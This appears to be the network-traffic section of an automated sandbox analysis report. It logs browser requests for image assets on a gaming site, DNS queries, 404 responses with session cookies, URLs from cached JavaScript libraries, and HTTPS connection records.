Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/3yfmucpss64mk.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/tocki7xk7xwq1.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/uft593z8hu17w.png?ver=1727844915 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/wpqadzg74mj7y.png?ver=1731292166 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/86burqb38a9ua.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/fmjyoi4wkifrs.png?ver=1727844915 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ao6qfxp1sqamn.png?ver=1722582213 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/zcw3utgfzk75o.png?ver=1718611710 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/z7k6mqf3z495a.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/mur8wje4dccb1.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/86hskqb38a9ua.png?ver=1722582213 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/cz3wgrounyetc.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/5m6k9j7rwspjs.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/j9nzkkbjfaz1a.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/wcaadzg74mj7y.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ue8mt39rhzpps.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/soojfuqnaxycn.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/3yfmucpss64mk.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/tocki7xk7xwq1.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/z7k6mqf3z495a.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/mur8wje4dccb1.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/86burqb38a9ua.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/cz3wgrounyetc.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/5m6k9j7rwspjs.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/j9nzkkbjfaz1a.png?ver=1673334590 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/wcaadzg74mj7y.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ue8mt39rhzpps.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: b45032.com
Source: global trafficDNS traffic detected: DNS query: 5getfab.segrft.com
Source: global trafficDNS traffic detected: DNS query: hm.baidu.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:47:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAlt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; expires=Mon, 13-Jan-2025 01:47:53 GMT; Max-Age=7200; path=/; secure; samesite=noneSet-Cookie: vanguard_session=eyJpdiI6Ik1vMzBOMWtcL1ZTZ3ZHQ3BqREs1SFB3PT0iLCJ2YWx1ZSI6Ill0NVlqZk5SdTQ1WGVuTWtrUkdxSEV4XC9DbWYrS0k2b01PVWkxenF3d0wxWUl4bVlrZDVNUTJ2NWNUVGVPZFp6VXJCS2pWSHlhdCt0MEZLMVwvZ3ppTUE9PSIsIm1hYyI6ImZkODJkNTUwOGQyYWQ0ZWRiZjhhYWM3ODQ5ODkzNjFiYjljNTVlMTY4OTMwYTdlZWI0YTEzODdjMzNkM2M5N2IifQ%3D%3D; expires=Mon, 13-Jan-2025 01:47:53 GMT; Max-Age=7200; path=/; secure; httponly; samesite=noneServer: nginx
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:48:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateServer: CDNoh
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:48:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAlt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6Imo0XC9uRGZFczNsdG9ZaVpVcGZEREV3PT0iLCJ2YWx1ZSI6InVLTE9qUVdINlVYMlNPODJtYXFDbUtGZjVZbmpHNkZoUFwvYUwyVGhLUG5ybDVnT05aS0E5TVhFVUg0cUZwSk83OThJQllmUElkWUdpU012WTdWRnRvUT09IiwibWFjIjoiYWJlNTg2MmY2NGUwY2QyMjdkMGMyMmY2MGM5Y2YxNTU5NThmY2RjYTBiMDU1Zjc3MmE3NmMzZGJhNDBkNjZiNiJ9; expires=Mon, 13-Jan-2025 01:48:21 GMT; Max-Age=7200; path=/; secure; samesite=noneSet-Cookie: vanguard_session=eyJpdiI6IlBpRDBtQXdWbzRNZzAxYnNYcTVWbGc9PSIsInZhbHVlIjoiTW05T0llbjJiM1F6a1d6QzVuZkJGQ0dSRHVCMCswbW8xZWJvZWxXeUNWdmlyZ290bFJlb2pBNHVTQmJBUHBqWHh2U1FrandDMmQ0S2JxdjAwT2Fvcmc9PSIsIm1hYyI6IjEyMGIwZjc5NWI5MGY0NmU5Y2ZmNGFmNGFiZjhkY2RiOWFkYTdmY2NiMjRmODQ2ZTg2NDNlOWVhNTJiN2ZjMzUifQ%3D%3D; expires=Mon, 13-Jan-2025 01:48:21 GMT; Max-Age=7200; path=/; secure; httponly; samesite=noneServer: nginx
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:48:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateServer: CDNoh
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:48:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAlt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6InFOakFHbWdqSmpqRlR4WEtYXC9salhRPT0iLCJ2YWx1ZSI6IlwvNXBzcXpOdmFoSWxQNEJqOWlzdmlyRGpTTjZJUGlsbk95NHVVVllwQmp4YmtZRFlOaTJwMGdkXC9Gd2wrM08wK2VxNjBObklCTTFDSTZCVDd5RmdISUE9PSIsIm1hYyI6Ijk1YTBhNzFhN2U1YzAxYTM1ZjBhN2FiYzZkYjAyYjEwOTRlNGQ4MDZiY2FiMTMwNjZmMzM0NzM3MDg3YmQ5ZjEifQ%3D%3D; expires=Mon, 13-Jan-2025 01:48:49 GMT; Max-Age=7200; path=/; secure; samesite=noneSet-Cookie: vanguard_session=eyJpdiI6ImhNU1VRb01aR0RzMFVaeXBqbThaT2c9PSIsInZhbHVlIjoiaW4yNXppeE1wSGlZQzNiVVgwS1ZaMGNMV2EzbFRjWG52NUNydWFJQmN0em9LejFKdzIwbWpWeXpDNEV2Sk9HSW55MWJkWGRodE1hZ1krSklzcjJcL0FRPT0iLCJtYWMiOiJmMjhjMTQxOWEwYjAwZGM1M2ZhMTJkZmVhNzA3Y2UyN2YzODI1MWY1MjljNDliOTEzOTI4NmNkNzYwNGM3NTc4In0%3D; expires=Mon, 13-Jan-2025 01:48:49 GMT; Max-Age=7200; path=/; secure; httponly; samesite=noneServer: nginx
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://docs.closure-library.googlecode.com/git/closure_goog_date_date.js.source.html
Source: chromecache_354.2.dr, chromecache_356.2.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_300.2.dr, chromecache_241.2.dr, chromecache_483.2.dr, chromecache_371.2.drString found in binary or memory: http://jqueryui.com
Source: chromecache_265.2.dr, chromecache_468.2.drString found in binary or memory: http://kjur.github.com/jsrsasign/license
Source: chromecache_265.2.dr, chromecache_468.2.drString found in binary or memory: http://kjur.github.io/jsrsasign/license/
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://momentjs.com/guides/#/warnings/add-inverted-param/
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://momentjs.com/guides/#/warnings/define-locale/
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://momentjs.com/guides/#/warnings/dst-shifted/
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://momentjs.com/guides/#/warnings/js-date/
Source: chromecache_334.2.drString found in binary or memory: http://momentjs.com/guides/#/warnings/min-max/
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://momentjs.com/guides/#/warnings/zone/
Source: chromecache_422.2.dr, chromecache_431.2.drString found in binary or memory: http://momentjs.com/timezone/docs/#/data-loading/.
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://stackoverflow.com/questions/181348/instantiating-a-javascript-object-by-calling-prototype-con
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: http://stackoverflow.com/questions/3561493/is-there-a-regexp-escape-function-in-javascript
Source: chromecache_226.2.drString found in binary or memory: http://tongji.baidu.com/hm-web/welcome/ico
Source: chromecache_265.2.dr, chromecache_468.2.drString found in binary or memory: http://www-cs-students.stanford.edu/~tjw/jsbn/
Source: chromecache_266.2.dr, chromecache_307.2.drString found in binary or memory: http://www.idangero.us/swiper/
Source: chromecache_226.2.drString found in binary or memory: https://fclog.baidu.com/log/ocpcagl?type=behavior&emd=euc
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: https://github.com/dordille/moment-isoduration/blob/master/moment.isoduration.js
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: https://github.com/moment/moment/issues/1423
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: https://github.com/moment/moment/issues/2166
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: https://github.com/moment/moment/issues/2978
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: https://github.com/moment/moment/pull/1871
Source: chromecache_226.2.drString found in binary or memory: https://goutong.baidu.com/site/
Source: chromecache_226.2.drString found in binary or memory: https://hmcdn.baidu.com/static
Source: chromecache_226.2.drString found in binary or memory: https://hmcdn.baidu.com/static/tongji/plugins/
Source: chromecache_270.2.dr, chromecache_334.2.drString found in binary or memory: https://nodejs.org/dist/latest/docs/api/util.html#util_custom_inspect_function_on_objects
Source: chromecache_265.2.dr, chromecache_468.2.drString found in binary or memory: https://npmcdn.com/jsencrypt
Source: chromecache_286.2.dr, chromecache_423.2.drString found in binary or memory: https://ssl.captcha.qq.com/TCaptcha.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
